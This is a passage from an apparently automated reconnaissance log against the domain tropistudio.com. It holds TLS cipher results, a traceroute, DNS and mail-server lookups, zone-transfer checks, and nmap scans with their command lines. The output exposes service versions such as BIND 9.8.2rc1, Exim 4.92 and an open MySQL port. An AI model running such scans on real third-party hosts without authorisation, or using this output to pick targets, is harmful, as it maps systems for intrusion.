719 * TLSV1_1 Cipher Suites:
720 Forward Secrecy OK - Supported
721 RC4 OK - Not Supported
722
723 Preferred:
724 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
725 Accepted:
726 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
727 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
728 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
729 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
730 TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
731 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
732 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
733 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
734 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
735 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
736 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
737 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
738
739 * TLSV1 Cipher Suites:
740 Server rejected all cipher suites.
741
742
743 SCAN COMPLETED IN 43.49 S
744 -------------------------
745########################################################################################################################
746traceroute to tropistudio.com (111.90.145.39), 30 hops max, 60 byte packets
747 1 _gateway (10.203.15.1) 130.693 ms 130.689 ms 130.677 ms
748 2 * * *
749 3 te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49) 135.129 ms 135.110 ms 135.284 ms
750 4 be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249) 134.890 ms 134.843 ms 134.834 ms
751 5 be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190) 140.553 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194) 140.318 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190) 140.494 ms
752 6 be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1) 162.701 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105) 154.158 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1) 153.875 ms
753 7 be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205) 163.903 ms 167.087 ms 163.661 ms
754 8 be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93) 256.262 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41) 260.913 ms 254.170 ms
755 9 be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130) 254.097 ms be12489.ccr42.par01.atlas.cogentco.com (154.54.57.70) 254.254 ms be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130) 250.860 ms
75610 be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197) 248.010 ms be2318.ccr32.bio02.atlas.cogentco.com (154.54.61.117) 253.777 ms 251.863 ms
75711 be2806.ccr41.dca01.atlas.cogentco.com (154.54.40.106) 247.310 ms 244.297 ms 248.872 ms
75812 be3084.ccr42.dca01.atlas.cogentco.com (154.54.30.65) 250.155 ms 252.725 ms be2113.ccr42.atl01.atlas.cogentco.com (154.54.24.222) 261.909 ms
75913 be2112.ccr41.atl01.atlas.cogentco.com (154.54.7.158) 266.031 ms be2687.ccr41.iah01.atlas.cogentco.com (154.54.28.70) 271.912 ms be2113.ccr42.atl01.atlas.cogentco.com (154.54.24.222) 265.718 ms
76014 be2690.ccr42.iah01.atlas.cogentco.com (154.54.28.130) 276.032 ms be2927.ccr21.elp01.atlas.cogentco.com (154.54.29.222) 293.287 ms be2690.ccr42.iah01.atlas.cogentco.com (154.54.28.130) 277.025 ms
76115 be2928.ccr21.elp01.atlas.cogentco.com (154.54.30.162) 294.335 ms 297.372 ms be2927.ccr21.elp01.atlas.cogentco.com (154.54.29.222) 294.488 ms
76216 be2930.ccr32.phx01.atlas.cogentco.com (154.54.42.77) 303.329 ms be2931.ccr41.lax01.atlas.cogentco.com (154.54.44.86) 309.749 ms 306.666 ms
76317 be2932.ccr42.lax01.atlas.cogentco.com (154.54.45.162) 317.282 ms be2931.ccr41.lax01.atlas.cogentco.com (154.54.44.86) 313.871 ms be3271.ccr41.lax04.atlas.cogentco.com (154.54.42.102) 317.184 ms
76418 38.104.210.82 (38.104.210.82) 311.881 ms be3271.ccr41.lax04.atlas.cogentco.com (154.54.42.102) 313.996 ms 38.104.210.82 (38.104.210.82) 312.023 ms
76519 ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17) 476.803 ms 38.104.210.82 (38.104.210.82) 317.216 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17) 477.342 ms
76620 ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17) 484.678 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57) 482.031 ms 479.575 ms
76721 61.11.210.114 (61.11.210.114) 478.389 ms 476.253 ms 480.230 ms
76822 124.158.230.70 (124.158.230.70) 476.788 ms 477.673 ms 477.101 ms
76923 111.90.128.46 (111.90.128.46) 486.020 ms 487.635 ms 124.158.230.70 (124.158.230.70) 481.825 ms
77024 111.90.128.46 (111.90.128.46) 489.366 ms 485.721 ms 172.16.16.2 (172.16.16.2) 488.501 ms
77125 172.16.16.2 (172.16.16.2) 488.340 ms * *
77226 web16.support-emilid.com (111.90.145.39) 479.219 ms * *
773#######################################################################################################################
774Domains still to check: 1
775 Checking if the hostname tropistudio.com. given is in fact a domain...
776
777Analyzing domain: tropistudio.com.
778 Checking NameServers using system default resolver...
779 IP: 173.201.73.6 (United States)
780 HostName: ns12.domaincontrol.com Type: NS
781 HostName: ns12.domaincontrol.com Type: PTR
782 IP: 97.74.105.6 (United States)
783 HostName: ns11.domaincontrol.com Type: NS
784 HostName: ns11.domaincontrol.com Type: PTR
785
786 Checking MailServers using system default resolver...
787 IP: 68.178.213.244 (United States)
788 HostName: mailstore1.secureserver.net Type: MX
789 HostName: ip-68-178-213-244.ip.secureserver.net Type: PTR
790 IP: 68.178.213.243 (United States)
791 HostName: mailstore1.secureserver.net Type: MX
792 HostName: ip-68-178-213-243.ip.secureserver.net Type: PTR
793 IP: 72.167.238.32 (United States)
794 HostName: mailstore1.secureserver.net Type: MX
795 HostName: p3pismtp01-065.prod.phx3.secureserver.net Type: PTR
796 IP: 68.178.213.37 (United States)
797 HostName: smtp.secureserver.net Type: MX
798 HostName: p3plibsmtp02-v01.prod.phx3.secureserver.net Type: PTR
799 IP: 68.178.213.203 (United States)
800 HostName: smtp.secureserver.net Type: MX
801 HostName: p3plibsmtp03-v01.prod.phx3.secureserver.net Type: PTR
802 IP: 72.167.238.29 (United States)
803 HostName: smtp.secureserver.net Type: MX
804 HostName: p3plibsmtp01-v01.prod.phx3.secureserver.net Type: PTR
805
806 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
807 No zone transfer found on nameserver 97.74.105.6
808 No zone transfer found on nameserver 173.201.73.6
809
810 Checking SPF record...
811 No SPF record
812
813 Checking 192 most common hostnames using system default resolver...
814 IP: 111.90.145.39 (Malaysia)
815 HostName: www.tropistudio.com. Type: A
816
817 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
818 Checking netblock 68.178.213.0
819 Checking netblock 97.74.105.0
820 Checking netblock 173.201.73.0
821 Checking netblock 72.167.238.0
822 Checking netblock 111.90.145.0
823
824 Searching for tropistudio.com. emails in Google
825
826 Checking 9 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
827 Host 68.178.213.244 is up (echo-reply ttl 43)
828 Host 68.178.213.37 is up (syn-ack ttl 43)
829 Host 97.74.105.6 is up (udp-response ttl 52)
830 Host 173.201.73.6 is up (udp-response ttl 51)
831 Host 72.167.238.29 is up (syn-ack ttl 42)
832 Host 111.90.145.39 is up (udp-response ttl 43)
833 Host 68.178.213.203 is up (syn-ack ttl 43)
834 Host 72.167.238.32 is up (syn-ack ttl 43)
835 Host 68.178.213.243 is up (echo-reply ttl 42)
836
837 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
838 Scanning ip 68.178.213.244 (ip-68-178-213-244.ip.secureserver.net (PTR)):
839 25/tcp open smtp? syn-ack ttl 43
840 | fingerprint-strings:
841 | DNSStatusRequestTCP, DNSVersionBindReqTCP:
842 | 421 p3plibsmtp03-06.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
843 | GenericLines, Help:
844 | 421 p3plibsmtp03-11.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
845 | GetRequest, Hello:
846 | 421 p3plibsmtp03-02.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
847 | HTTPOptions, RPCCheck, RTSPRequest:
848 | 421 p3plibsmtp03-13.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
849 | NULL:
850 |_ 421 p3plibsmtp03-08.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
851 |_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection closed
852 Scanning ip 68.178.213.37 (p3plibsmtp02-v01.prod.phx3.secureserver.net (PTR)):
853 25/tcp open smtp? syn-ack ttl 43
854 | fingerprint-strings:
855 | DNSStatusRequestTCP, DNSVersionBindReqTCP, RPCCheck:
856 | 421 p3plibsmtp02-09.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
857 | GenericLines, Help:
858 | 421 p3plibsmtp02-14.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
859 | GetRequest, HTTPOptions, RTSPRequest:
860 | 421 p3plibsmtp02-07.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
861 | Hello, NULL:
862 |_ 421 p3plibsmtp02-08.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
863 |_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection closed
864 Scanning ip 97.74.105.6 (ns11.domaincontrol.com (PTR)):
865 53/tcp open tcpwrapped syn-ack ttl 52
866 Scanning ip 173.201.73.6 (ns12.domaincontrol.com (PTR)):
867 53/tcp open tcpwrapped syn-ack ttl 52
868 Scanning ip 72.167.238.29 (p3plibsmtp01-v01.prod.phx3.secureserver.net (PTR)):
869 25/tcp open smtp? syn-ack ttl 43
870 | fingerprint-strings:
871 | DNSStatusRequestTCP, Help:
872 | 421 p3plibsmtp01-15.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
873 | DNSVersionBindReqTCP, GenericLines:
874 | 421 p3plibsmtp01-09.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
875 | GetRequest:
876 | 421 p3plibsmtp01-08.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
877 | HTTPOptions:
878 | 421 p3plibsmtp01-07.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
879 | Hello, RPCCheck:
880 | 421 p3plibsmtp01-10.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
881 | NULL:
882 | 421 p3plibsmtp01-13.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
883 | RTSPRequest:
884 |_ 421 p3plibsmtp01-01.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
885 |_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection closed
886 Scanning ip 111.90.145.39 (www.tropistudio.com.):
887 21/tcp open ftp syn-ack ttl 43 Pure-FTPd
888 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
889 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
890 | Public Key type: rsa
891 | Public Key bits: 2048
892 | Signature Algorithm: sha1WithRSAEncryption
893 | Not valid before: 2019-05-03T09:49:26
894 | Not valid after: 2046-09-17T09:49:26
895 | MD5: 5e1b 76dc 7348 aee1 38f7 2272 1ea7 6cfe
896 |_SHA-1: 8d35 b1fb 5d2f 9ae3 0d01 a319 f323 03fd c6b1 3573
897 25/tcp open smtp syn-ack ttl 43 Exim smtpd 4.92
898 | smtp-commands: server98222.domain.local Hello nmap.scanme.org [45.132.192.65], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
899 |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
900 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
901 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
902 | Public Key type: rsa
903 | Public Key bits: 4096
904 | Signature Algorithm: sha1WithRSAEncryption
905 | Not valid before: 2016-05-13T00:34:32
906 | Not valid after: 2043-09-28T00:34:32
907 | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
908 |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
909 |_ssl-date: 2020-02-29T07:03:25+00:00; -4m17s from scanner time.
910 53/tcp open domain syn-ack ttl 42 ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
911 | dns-nsid:
912 |_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
913 80/tcp open ssl/http syn-ack ttl 42 Apache/2
914 | http-methods:
915 |_ Supported Methods: HEAD GET POST OPTIONS
916 |_http-server-header: Apache/2
917 |_http-title: Site doesn't have a title (text/html).
918 110/tcp open pop3 syn-ack ttl 43 Dovecot DirectAdmin pop3d
919 |_pop3-capabilities: AUTH-RESP-CODE UIDL TOP PIPELINING USER SASL(PLAIN) STLS RESP-CODES CAPA
920 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
921 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
922 | Public Key type: rsa
923 | Public Key bits: 4096
924 | Signature Algorithm: sha1WithRSAEncryption
925 | Not valid before: 2016-05-13T00:34:32
926 | Not valid after: 2043-09-28T00:34:32
927 | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
928 |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
929 |_ssl-date: 2020-02-29T07:03:25+00:00; -4m17s from scanner time.
930 111/tcp open rpcbind syn-ack ttl 43 2-4 (RPC #100000)
931 | rpcinfo:
932 | program version port/proto service
933 | 100000 2,3,4 111/tcp rpcbind
934 | 100000 2,3,4 111/udp rpcbind
935 | 100000 3,4 111/tcp6 rpcbind
936 | 100000 3,4 111/udp6 rpcbind
937 | 100024 1 35598/tcp status
938 | 100024 1 43746/tcp6 status
939 | 100024 1 48690/udp6 status
940 |_ 100024 1 56252/udp status
941 143/tcp open imap syn-ack ttl 42 Dovecot imapd
942 |_imap-capabilities: SASL-IR more ID LOGIN-REFERRALS STARTTLS post-login LITERAL+ OK IMAP4rev1 Pre-login AUTH=PLAINA0001 listed ENABLE capabilities IDLE have
943 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
944 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
945 | Public Key type: rsa
946 | Public Key bits: 4096
947 | Signature Algorithm: sha1WithRSAEncryption
948 | Not valid before: 2016-05-13T00:34:32
949 | Not valid after: 2043-09-28T00:34:32
950 | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
951 |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
952 |_ssl-date: 2020-02-29T07:03:25+00:00; -4m18s from scanner time.
953 443/tcp open ssl/ssl syn-ack ttl 43 Apache httpd (SSL-only mode)
954 | http-methods:
955 |_ Supported Methods: GET HEAD POST
956 |_http-server-header: Apache/2
957 |_http-title: 400 Bad Request
958 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
959 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
960 | Public Key type: rsa
961 | Public Key bits: 2048
962 | Signature Algorithm: sha1WithRSAEncryption
963 | Not valid before: 2019-05-03T09:49:26
964 | Not valid after: 2046-09-17T09:49:26
965 | MD5: 5e1b 76dc 7348 aee1 38f7 2272 1ea7 6cfe
966 |_SHA-1: 8d35 b1fb 5d2f 9ae3 0d01 a319 f323 03fd c6b1 3573
967 |_ssl-date: 2020-02-29T07:03:23+00:00; -4m17s from scanner time.
968 465/tcp open ssl/smtp syn-ack ttl 43 Exim smtpd 4.92
969 |_smtp-commands: Couldn't establish connection on port 465
970 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
971 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
972 | Public Key type: rsa
973 | Public Key bits: 4096
974 | Signature Algorithm: sha1WithRSAEncryption
975 | Not valid before: 2016-05-13T00:34:32
976 | Not valid after: 2043-09-28T00:34:32
977 | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
978 |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
979 |_ssl-date: 2020-02-29T07:03:23+00:00; -4m17s from scanner time.
980 587/tcp open smtp syn-ack ttl 42 Exim smtpd 4.92
981 | smtp-commands: server98222.domain.local Hello nmap.scanme.org [45.132.192.65], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
982 |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
983 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
984 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
985 | Public Key type: rsa
986 | Public Key bits: 4096
987 | Signature Algorithm: sha1WithRSAEncryption
988 | Not valid before: 2016-05-13T00:34:32
989 | Not valid after: 2043-09-28T00:34:32
990 | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
991 |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
992 |_ssl-date: 2020-02-29T07:03:25+00:00; -4m18s from scanner time.
993 993/tcp open ssl/imap syn-ack ttl 42
994 | fingerprint-strings:
995 | GenericLines:
996 | * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot DA ready.
997 | Error in IMAP command received by server.
998 | Error in IMAP command received by server.
999 | NULL:
1000 |_ * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot DA ready.
1001 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1002 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1003 | Public Key type: rsa
1004 | Public Key bits: 4096
1005 | Signature Algorithm: sha1WithRSAEncryption
1006 | Not valid before: 2016-05-13T00:34:32
1007 | Not valid after: 2043-09-28T00:34:32
1008 | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1009 |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1010 |_ssl-date: 2020-02-29T07:03:23+00:00; -4m17s from scanner time.
1011 995/tcp open ssl/pop3 syn-ack ttl 42 Dovecot DirectAdmin pop3d
1012 | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1013 | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1014 | Public Key type: rsa
1015 | Public Key bits: 4096
1016 | Signature Algorithm: sha1WithRSAEncryption
1017 | Not valid before: 2016-05-13T00:34:32
1018 | Not valid after: 2043-09-28T00:34:32
1019 | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1020 |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1021 |_ssl-date: 2020-02-29T07:03:24+00:00; -4m17s from scanner time.
1022 3306/tcp open mysql syn-ack ttl 42 MySQL (unauthorized)
1023 OS Info: Service Info: Host: server98222.domain.local; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
1024 Scanning ip 68.178.213.203 (p3plibsmtp03-v01.prod.phx3.secureserver.net (PTR)):
1025 Scanning ip 72.167.238.32 (p3pismtp01-065.prod.phx3.secureserver.net (PTR)):
1026 Scanning ip 68.178.213.243 (ip-68-178-213-243.ip.secureserver.net (PTR)):
1027 25/tcp open smtp? syn-ack ttl 43
1028 | fingerprint-strings:
1029 | DNSStatusRequestTCP:
1030 | 421 p3plibsmtp02-14.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1031 | DNSVersionBindReqTCP:
1032 | 421 p3plibsmtp02-15.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1033 | GenericLines, GetRequest, HTTPOptions, Help:
1034 | 421 p3plibsmtp02-02.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1035 | Hello:
1036 | 421 p3plibsmtp02-01.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1037 | NULL, RPCCheck, RTSPRequest:
1038 |_ 421 p3plibsmtp02-08.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1039 |_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection closed
1040 WebCrawling domain's web servers... up to 50 max links.
1041
1042 + URL to crawl: https://www.tropistudio.com.:80
1043 + Date: 2020-02-29
1044
1045 + Crawling URL: https://www.tropistudio.com.:80:
1046 + Links:
1047 + Crawling https://www.tropistudio.com.:80 ([SSL: WRONG_VERSION_NUMBER] wrong version number (_ssl.c:727))
1048 + Searching for directories...
1049 + Searching open folders...
1050
1051
1052 + URL to crawl: http://www.tropistudio.com.:443
1053 + Date: 2020-02-29
1054
1055 + Crawling URL: http://www.tropistudio.com.:443:
1056 + Links:
1057 + Crawling http://www.tropistudio.com.:443 (400 Bad Request)
1058 + Searching for directories...
1059 + Searching open folders...
1060
1061--Finished--
1062Summary information for domain tropistudio.com.
1063-----------------------------------------
1064
1065 Domain Ips Information:
1066 IP: 68.178.213.244
1067 HostName: mailstore1.secureserver.net Type: MX
1068 HostName: ip-68-178-213-244.ip.secureserver.net Type: PTR
1069 Country: United States
1070 Is Active: True (echo-reply ttl 43)
1071 Port: 25/tcp open smtp? syn-ack ttl 43
1072 Script Info: | fingerprint-strings:
1073 Script Info: | DNSStatusRequestTCP, DNSVersionBindReqTCP:
1074 Script Info: | 421 p3plibsmtp03-06.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1075 Script Info: | GenericLines, Help:
1076 Script Info: | 421 p3plibsmtp03-11.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1077 Script Info: | GetRequest, Hello:
1078 Script Info: | 421 p3plibsmtp03-02.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1079 Script Info: | HTTPOptions, RPCCheck, RTSPRequest:
1080 Script Info: | 421 p3plibsmtp03-13.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1081 Script Info: | NULL:
1082 Script Info: |_ 421 p3plibsmtp03-08.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1083 Script Info: |_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection closed
1084 IP: 68.178.213.37
1085 HostName: smtp.secureserver.net Type: MX
1086 HostName: p3plibsmtp02-v01.prod.phx3.secureserver.net Type: PTR
1087 Country: United States
1088 Is Active: True (syn-ack ttl 43)
1089 Port: 25/tcp open smtp? syn-ack ttl 43
1090 Script Info: | fingerprint-strings:
1091 Script Info: | DNSStatusRequestTCP, DNSVersionBindReqTCP, RPCCheck:
1092 Script Info: | 421 p3plibsmtp02-09.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1093 Script Info: | GenericLines, Help:
1094 Script Info: | 421 p3plibsmtp02-14.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1095 Script Info: | GetRequest, HTTPOptions, RTSPRequest:
1096 Script Info: | 421 p3plibsmtp02-07.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1097 Script Info: | Hello, NULL:
1098 Script Info: |_ 421 p3plibsmtp02-08.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1099 Script Info: |_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection closed
1100 IP: 97.74.105.6
1101 HostName: ns11.domaincontrol.com Type: NS
1102 HostName: ns11.domaincontrol.com Type: PTR
1103 Country: United States
1104 Is Active: True (udp-response ttl 52)
1105 Port: 53/tcp open tcpwrapped syn-ack ttl 52
1106 IP: 173.201.73.6
1107 HostName: ns12.domaincontrol.com Type: NS
1108 HostName: ns12.domaincontrol.com Type: PTR
1109 Country: United States
1110 Is Active: True (udp-response ttl 51)
1111 Port: 53/tcp open tcpwrapped syn-ack ttl 52
1112 IP: 72.167.238.29
1113 HostName: smtp.secureserver.net Type: MX
1114 HostName: p3plibsmtp01-v01.prod.phx3.secureserver.net Type: PTR
1115 Country: United States
1116 Is Active: True (syn-ack ttl 42)
1117 Port: 25/tcp open smtp? syn-ack ttl 43
1118 Script Info: | fingerprint-strings:
1119 Script Info: | DNSStatusRequestTCP, Help:
1120 Script Info: | 421 p3plibsmtp01-15.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1121 Script Info: | DNSVersionBindReqTCP, GenericLines:
1122 Script Info: | 421 p3plibsmtp01-09.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1123 Script Info: | GetRequest:
1124 Script Info: | 421 p3plibsmtp01-08.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1125 Script Info: | HTTPOptions:
1126 Script Info: | 421 p3plibsmtp01-07.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1127 Script Info: | Hello, RPCCheck:
1128 Script Info: | 421 p3plibsmtp01-10.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1129 Script Info: | NULL:
1130 Script Info: | 421 p3plibsmtp01-13.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1131 Script Info: | RTSPRequest:
1132 Script Info: |_ 421 p3plibsmtp01-01.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1133 Script Info: |_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection closed
1134 IP: 111.90.145.39
1135 HostName: www.tropistudio.com. Type: A
1136 Country: Malaysia
1137 Is Active: True (udp-response ttl 43)
1138 Port: 21/tcp open ftp syn-ack ttl 43 Pure-FTPd
1139 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
1140 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
1141 Script Info: | Public Key type: rsa
1142 Script Info: | Public Key bits: 2048
1143 Script Info: | Signature Algorithm: sha1WithRSAEncryption
